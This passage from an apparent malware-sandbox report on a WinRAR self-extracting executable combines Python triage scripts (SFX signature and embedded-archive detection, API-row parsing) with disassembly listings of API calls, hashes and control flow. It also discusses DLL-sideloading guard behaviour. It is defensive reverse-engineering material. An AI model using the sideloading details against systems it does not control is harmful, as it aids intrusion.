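        # enough, but two stub strings plus an embedded archive is.
        return self.is_pe and len(self.markers_found) >= 2 and self.rar_offset is not None


def _contains(data: bytes, s: str) -> bool:
    # The stub uses the W (UTF-16LE) APIs, so check that encoding first.
    return s.encode("utf-16-le") in data or s.encode("ascii") in data


def find_rar_payload(data: bytes) -> tuple[int | None, str | None]:
    """Return (offset, version) of the earliest embedded RAR header, if any."""
    candidates = [(o, "RAR5") for o in [data.find(RAR5_MAGIC)] if o >= 0]
    candidates += [(o, "RAR4") for o in [data.find(RAR4_MAGIC)] if o >= 0]
    if not candidates:
        return None, None
    return min(candidates)  # smallest offset wins


def triage(data: bytes) -> SfxTriage:
    """Classify a file image: PE?, which stub strings, guard present?, payload offset."""
    result = SfxTriage(is_pe=data[:2] == b"MZ")
    result.markers_found = [m for m in SFX_MARKERS if _contains(data, m)]
    result.sideload_guard = all(_contains(data, d) for d in SIDELOAD_DLLS)
    result.rar_offset, result.rar_version = find_rar_payload(data)
    return result


def build_sample() -> bytes:
    """Constructed stand-in for an SFX image (not the real DCobxod.exe):
    an MZ header, a few stub strings as UTF-16LE, filler, then a RAR5 header."""
    body = b"MZ" + b"\x00" * 62
    for s in SFX_MARKERS[:3] + SIDELOAD_DLLS:
        body += s.encode("utf-16-le") + b"\x00\x00"
    body += b"\x90" * 17
    body += RAR5_MAGIC + b"\x00" * 32
    return body


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_sample()
    t = triage(blob)
    print(f"PE: {t.is_pe}  WinRAR SFX: {t.is_winrar_sfx}")
    print(f"stub strings: {t.markers_found}")
    print(f"sideload guard strings present: {t.sideload_guard}")
    if t.rar_offset is not None:
        print(f"embedded {t.rar_version} archive at offset 0x{t.rar_offset:x}")
```

Run it as `python sfx_triage.py DCobxod.exe` against the original sample to get the archive offset; `dd`/`tail -c +N` from that offset yields a plain RAR file that can be listed and extracted without executing the stub. Note the guard's other consequence for analysts: dropping one of the three DLL names beside an SFX to test for sideloading makes the stub print the warning and exit instead of running, so the behaviour is a detection artifact, not a weakness.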

                                                              Control-flow Graph
                                                              • Rendered graph not preserved. Summary: function 0042C73F-0042D418; the entry block calls 0042EB78 and 0042EC50, the main loop calls 0042B314, 0042AF98 and 00421FBB; the extraction path calls 0042A64D, 0041BDF3, 0041A544, 0041A67E, 00416EDB, 0041A5D1, SetFileAttributesW, 0041B991, 0041B690, 00433E13, 0041BDB4, 0042FFF0, GetFileAttributesW, DeleteFileW, 00414092, MoveFileW, MoveFileExW and 0041A55A; the dialog/text path calls 00437686, 0042B48E, 00433E13, 00433E3E, 00433E2E, SetWindowTextW, 00420602, 004205DA, 0043279B, 0042B1BE, GetDlgItem, SendMessageW and 00433E49.
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042C744
                                                                • Part of subcall function 0042B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0042B3FB
                                                                • Part of subcall function 0042AF98: _wcschr.LIBVCRUNTIME ref: 0042B033
                                                              • _wcslen.LIBCMT ref: 0042CA0A
                                                              • _wcslen.LIBCMT ref: 0042CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0042CA71
                                                              • _wcslen.LIBCMT ref: 0042CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0042CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0042CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0042CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,0045A472), ref: 0042CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0042CC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$<B$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$B
                                                              • API String ID: 986293930-4084395682
                                                              • Opcode ID: 9e2a188804dccbc4fa8751d8063872bbc83f8161d6a8d2514a106e5ef9e5232d
                                                              • Instruction ID: 8d41bd92862dd9a9a1dd70fa8f8daed738802c07fa2998ef2259d158826b6c39
                                                              • Opcode Fuzzy Hash: 9e2a188804dccbc4fa8751d8063872bbc83f8161d6a8d2514a106e5ef9e5232d
                                                              • Instruction Fuzzy Hash: 56E16972A00128AADF24DB61ED85EEF73BCAB05350F5041A7F545E3140EB789F848F69
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041DA70
                                                              • _wcschr.LIBVCRUNTIME ref: 0041DA91
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0041DAAC
                                                                • Part of subcall function 0041C29A: _wcslen.LIBCMT ref: 0041C2A2
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 00421B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0041BAE9,00000000,?,?,?,0001041E), ref: 00421BA0
                                                              • _wcslen.LIBCMT ref: 0041DDE9
                                                              • __fprintf_l.LIBCMT ref: 0041DF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9D
                                                              • API String ID: 557298264-3442010527
                                                              • Opcode ID: 615fca7a5ec14a9533691910958e3f80033d41b3660e22b8e20150971c6f06fa
                                                              • Instruction ID: 1b91c1c65f857c0fda28986259004d2bfa804cb07db239eed686d78a8d6cddc5
                                                              • Opcode Fuzzy Hash: 615fca7a5ec14a9533691910958e3f80033d41b3660e22b8e20150971c6f06fa
                                                              • Instruction Fuzzy Hash: 0B3201B5A00218ABDF24EF69C842BEA77A4FF08704F40455BFD0597281E7B9ADC5CB58

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              • GetDlgItem.USER32(00000068,0046FCB8), ref: 0042D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0042AF07,00000001,?,?,0042B7B9,0044506C,0046FCB8,0046FCB8,00001000,00000000,00000000), ref: 0042D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0042D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0042D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004443F4), ref: 0042D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 27d5a1923703a27a6e0caf81c2a37cea3854d816167cdccae29b53e07a3c07ea
                                                              • Instruction ID: c274534f3587fb14408b99b21f350d459826d95b599f69779bfc65932b20f390
                                                              • Opcode Fuzzy Hash: 27d5a1923703a27a6e0caf81c2a37cea3854d816167cdccae29b53e07a3c07ea
                                                              • Instruction Fuzzy Hash: 5831C671245382BBD301DF20AC4AF6B7FACEB82706F004929F59596191DB649A44C77E

                                                              Control-flow Graph

                                                               [Control-flow graph of the function at 0x0042D78F: executed/not-executed block colouring and edge listing omitted. API references visible in the graph nodes: ShowWindow, GetExitCodeProcess, CloseHandle.]
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0042D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0042D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0042D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0042D959
                                                              • CloseHandle.KERNEL32(?), ref: 0042D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0042D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf$PDGu<B$hB$rB
                                                              • API String ID: 36480843-1959456613
                                                              • Opcode ID: 8563462885c6d4404a1628e4532cc00467b70d111be788114e468abdaf84b2a4
                                                              • Instruction ID: 5513bbf4bf4887fb1e4af73a326b7a557cb692b22cf8d3af4d224fe8c02117f5
                                                              • Opcode Fuzzy Hash: 8563462885c6d4404a1628e4532cc00467b70d111be788114e468abdaf84b2a4
                                                              • Instruction Fuzzy Hash: 9C5106B0A043909AEB30AF24B8447AB7BE4AF45744F84042FF5C597291E7B9CD84CB5E
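
The "APIs" rows in these function entries follow one line format: an optional "Part of subcall function <addr>:" prefix, then <API>.<module>(<args>), ref: <call-site address>. The Python below is an added example for this page, not Joe Sandbox code: it parses rows in that format, keeps the sub-function address for indirect calls, decodes the message IDs carried in the SendMessageW rows (EM_SETSEL 0xB1, EM_REPLACESEL 0xC2, CB_ADDSTRING 0x143, EM_GETCHARFORMAT 0x43A, EM_SETCHARFORMAT 0x444, from winuser.h and richedit.h), and groups call sites by behaviour. The sample rows are copied from the listings above; the behaviour-tag table is an analyst's own grouping and is assumed, not a report field.

```python
"""Parse the per-function "APIs" rows of a Joe Sandbox IDA-plugin listing and
tag the call sites an analyst triages first.

Added example for this page; it is not Joe Sandbox code.  The TAGS table is
an analyst's own grouping (assumption), not a Joe Sandbox category."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Rows copied verbatim from the listings above (taken from two different functions).
SAMPLE_ROWS = """\
• __EH_prolog.LIBCMT ref: 0042C744
  • Part of subcall function 0042B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0042B3FB
• SetWindowTextW.USER32(?,?), ref: 0042CA71
• GetDlgItem.USER32(?,00000066), ref: 0042CC36
• SendMessageW.USER32(00000000,00000143,00000000,0045A472), ref: 0042CC54
• ShellExecuteExW.SHELL32(?), ref: 0042D8DE
• GetExitCodeProcess.KERNEL32(?,?), ref: 0042D959
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042D51B
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D59D
"""

# One row: optional "Part of subcall function <addr>:" prefix, then
# <api>.<module>(<args>), ref: <address>.  CRT helper rows such as
# __EH_prolog carry no argument list at all.
ROW_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Message IDs seen in the SendMessageW rows (winuser.h / richedit.h; WM_USER = 0x400).
WM_NAMES = {
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x0143: "CB_ADDSTRING",
    0x043A: "EM_GETCHARFORMAT",  # WM_USER + 58
    0x0444: "EM_SETCHARFORMAT",  # WM_USER + 68
}

# Analyst's grouping of the APIs that matter for triage (assumption, not a report field).
TAGS = {
    "ShellExecuteExW": "process-execution",
    "CreateProcessW": "process-execution",
    "GetExitCodeProcess": "process-execution",
    "MoveFileW": "file-replace",
    "MoveFileExW": "file-replace",
    "DeleteFileW": "file-replace",
    "SetFileAttributesW": "file-replace",
    "ExpandEnvironmentStringsW": "path-construction",
    "GetSystemDirectoryW": "path-construction",
    "LoadLibraryW": "library-load",
    "LoadLibraryExW": "library-load",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                        # address of the call instruction
    parent: Optional[int] = None    # sub-function that really makes the call, if indirect
    tag: Optional[str] = None
    message: Optional[str] = None   # decoded SendMessageW uMsg, when the row carries one


def parse_api_rows(text: str) -> List[ApiCall]:
    """Turn the bullet rows into ApiCall records; headings and unknown rows are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = ApiCall(
            api=m["api"], module=m["module"], args=args, ref=int(m["ref"], 16),
            parent=int(m["parent"], 16) if m["parent"] else None,
            tag=TAGS.get(m["api"]),
        )
        # SendMessageW(hWnd, uMsg, wParam, lParam): the second argument is the message ID.
        if call.api == "SendMessageW" and len(args) > 1 and args[1] != "?":
            msg = int(args[1], 16)
            call.message = WM_NAMES.get(msg, f"0x{msg:04X}")
        calls.append(call)
    return calls


def triage(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group tagged call sites as 'API@ref' under their behaviour tag."""
    groups: Dict[str, List[str]] = {}
    for c in calls:
        if c.tag:
            groups.setdefault(c.tag, []).append(f"{c.api}@{c.ref:08X}")
    return {tag: sorted(sites) for tag, sites in groups.items()}


if __name__ == "__main__":
    parsed = parse_api_rows(SAMPLE_ROWS)
    for c in parsed:
        via = f" (via sub_{c.parent:08X})" if c.parent else ""
        extra = f" msg={c.message}" if c.message else ""
        print(f"{c.ref:08X} {c.api}.{c.module}{via}{extra}")
    print(triage(parsed))
```

Feed it the rows of one function entry at a time to get a per-function behaviour summary; rows that are only present in the control-flow graph (the file APIs of the first function above) are not in the APIs list and must be added by hand.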

                                                              Control-flow Graph

                                                               [Control-flow graph of the function at 0x0043A95B: executed/not-executed block colouring and edge listing omitted. API references visible in the graph nodes: MultiByteToWideChar, WideCharToMultiByte.]
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00435695,00435695,?,?,?,0043ABAC,00000001,00000001,2DE85006), ref: 0043A9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0043AA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043AB35
                                                              • __freea.LIBCMT ref: 0043AB42
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              • __freea.LIBCMT ref: 0043AB4B
                                                              • __freea.LIBCMT ref: 0043AB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: d87ad99f62cebd2f303a0336fb71b4dfbe9657ae5cc70f2d7258c7abe085508c
                                                              • Instruction ID: 7581443776c89096ca1562cfeb9a44d4cf583936840e4895a0937454065087d0
                                                              • Opcode Fuzzy Hash: d87ad99f62cebd2f303a0336fb71b4dfbe9657ae5cc70f2d7258c7abe085508c
                                                              • Instruction Fuzzy Hash: 4A513B72640212AFDB258F61CC41EBFB7AADB48710F25562EFE44D6240DB38EC60C65A

                                                              Control-flow Graph

                                                               [Control-flow graph of the function at 0x00433B72: executed/not-executed block colouring and edge listing omitted. API references visible in the graph nodes: LoadLibraryExW (two call sites), GetLastError, FreeLibrary; the APIs list below records only FreeLibrary.]
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00433C35,?,?,00472088,00000000,?,00433D60,00000004,InitializeCriticalSectionEx,00446394,InitializeCriticalSectionEx,00000000), ref: 00433C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 7bd092a813a2573ca79850f29edf268e4eb819821814b440e26e110606f5fcb3
                                                              • Instruction ID: 148c0969a80bef049415d08239393a85ec222b895ab0ee5407a9c9c0532409f5
                                                              • Opcode Fuzzy Hash: 7bd092a813a2573ca79850f29edf268e4eb819821814b440e26e110606f5fcb3
                                                              • Instruction Fuzzy Hash: 70113D35A04220A7CB218F589C4174AB764AF0AB72F111122F915FB390D774FF0086DD

                                                              Control-flow Graph

                                                               [Control-flow graph of the function at 0x0042ABAB: executed/not-executed block colouring and edge listing omitted. API references visible in the graph nodes: GetClassNameW, FindWindowExW.]
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0042ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0042ABF9
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0042ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                               • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: 0f828816c181e7fc835c70274381af973dfc6e091164fb96d17c1c8636822d98
                                                              • Instruction ID: 20d6499f0cfc6f19c5a5f38d8d80d136c4d35b2673aa2dc49e69365f559bed54
                                                              • Opcode Fuzzy Hash: 0f828816c181e7fc835c70274381af973dfc6e091164fb96d17c1c8636822d98
                                                              • Instruction Fuzzy Hash: 11F0823270027877DB206A25AC09F9B766C9B46B41F894026BE05E2184D7A8EA85C5BE

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • OleInitialize.OLE32(00000000), ref: 0042AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042AC66
                                                              • SHGetMalloc.SHELL32(00458438), ref: 0042AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Qo
                                                              • API String ID: 3498096277-4232643773
                                                              • Opcode ID: 86d0e5278cc7144fe52b8fde347db20f192d30b9dd2bb517651d3de24e461667
                                                              • Instruction ID: ccb43da53d15e02ef1af46d96a72550fa964b6abee0dca553959e15ae43976dd
                                                              • Opcode Fuzzy Hash: 86d0e5278cc7144fe52b8fde347db20f192d30b9dd2bb517651d3de24e461667
                                                              • Instruction Fuzzy Hash: 9EF04471900119ABC710AFA9D8499DFFFFCEF84705F00402AA405A2201DB7856458BA5

                                                              Control-flow Graph
                                                              control_flow_graph 1008 4198e0-419901 call 42ec50 1011 419903-419906 1008->1011 1012 41990c 1008->1012 1011->1012 1013 419908-41990a 1011->1013 1014 41990e-41991f 1012->1014 1013->1014 1015 419921 1014->1015 1016 419927-419931 1014->1016 1015->1016 1017 419933 1016->1017 1018 419936-419943 call 416edb 1016->1018 1017->1018 1021 419945 1018->1021 1022 41994b-41996a CreateFileW 1018->1022 1021->1022 1023 4199bb-4199bf 1022->1023 1024 41996c-41998e GetLastError call 41bb03 1022->1024 1025 4199c3-4199c6 1023->1025 1028 4199c8-4199cd 1024->1028 1033 419990-4199b3 CreateFileW GetLastError 1024->1033 1027 4199d9-4199de 1025->1027 1025->1028 1031 4199e0-4199e3 1027->1031 1032 4199ff-419a10 1027->1032 1028->1027 1030 4199cf 1028->1030 1030->1027 1031->1032 1034 4199e5-4199f9 SetFileTime 1031->1034 1035 419a12-419a2a call 420602 1032->1035 1036 419a2e-419a39 1032->1036 1033->1025 1037 4199b5-4199b9 1033->1037 1034->1032 1035->1036 1037->1025
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00417760,?,00000005,?,00000011), ref: 0041995F
                                                              • GetLastError.KERNEL32(?,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0041996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00417760,?,00000005,?), ref: 004199A2
                                                              • GetLastError.KERNEL32(?,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004199AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00417760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004199F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 36702e8be7b6738d5fe94d7f20d3bf43db97f951f89ba448c64334b4f7e2048f
                                                              • Instruction ID: 4f11f22bfbad2ad49b656ae999592567f164cb4c1b4ff374200f9da12dac07c8
                                                              • Opcode Fuzzy Hash: 36702e8be7b6738d5fe94d7f20d3bf43db97f951f89ba448c64334b4f7e2048f
                                                              • Instruction Fuzzy Hash: 053102B05447456FE7209F24CC46BDABB98BB05324F240B1EF9A1963D1D3A8AD84CB99

                                                              Control-flow Graph
